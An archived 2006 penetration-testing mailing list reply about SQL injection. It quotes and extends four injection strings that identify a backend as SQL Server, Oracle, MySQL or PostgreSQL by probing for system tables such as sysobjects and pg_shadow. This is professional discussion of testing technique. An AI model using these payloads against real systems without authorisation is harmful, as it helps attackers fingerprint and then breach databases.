Penetration Testing mailing list archives

RE: SQL injection (or not?)

From: Tonnerre Lombard <tonnerre.lombard () sygroup ch>
Date: Thu, 10 Aug 2006 06:31:08 +0200

Salut,

On Wed, 2006-08-09 at 12:01 +0200, Isidro Ramon Labrador Rodriguez
wrote:

Parameter=[valid value]' and exists(select * from sysobjects) and 'a'='a

If it returns a valid value the database is SQL Server


Parameter=[valid value]' and exists(select * from user_tables) and
'a'='a 
 
If it returns a valid value the database is Oracle


Parameter=[valid value]' and exists(select * from mysql.user) and 'a'='a

 
If it returns a valid value the database is MySQL


Parameter=[valid value]' and exists(select * from pg_shadow) and 'a'='a

should tell you it's PostgreSQL.

                                Tonnerre
-- 
SyGroup GmbH
Tonnerre Lombard

Loesungen mit System
Tel:+41 61 333 80 33    Roeschenzerstrasse 9
Fax:+41 61 383 14 67    4153 Reinach BL
Web:www.sygroup.ch      tonnerre.lombard () sygroup ch

Attachment: signature.asc
Description: This is a digitally signed message part

Current thread:

SQL injection (or not?) rr (Aug 08)
- Re: SQL injection (or not?) Mike Klingler (Aug 08)
- Re: SQL injection (or not?) A. Ramos (Aug 09)
- <Possible follow-ups>
- RE: SQL injection (or not?) Isidro Ramon Labrador Rodriguez (Aug 09)
  - RE: SQL injection (or not?) Tonnerre Lombard (Aug 09)
  - Re: SQL injection (or not?) DokFLeed (Aug 09)
    - Injected, whats next DokFLeed (Aug 17)
    - Re: Injected, whats next Jon Hart (Aug 18)
    - RE: Injected, whats next Clemens, Dan (Aug 18)
    - Re: Injected, whats next Serg B. (Aug 18)
    - Message not available
    - Re: Injected, whats next Serg B. (Aug 18)
    - Re: Injected, whats next Brendan Dolan-Gavitt (Aug 18)
    - Re: Injected, whats next DokFLeed (Aug 18)
- Re: SQL injection (or not?) rr (Aug 10)
- RE: SQL injection (or not?) C, Muruganandam (Aug 14)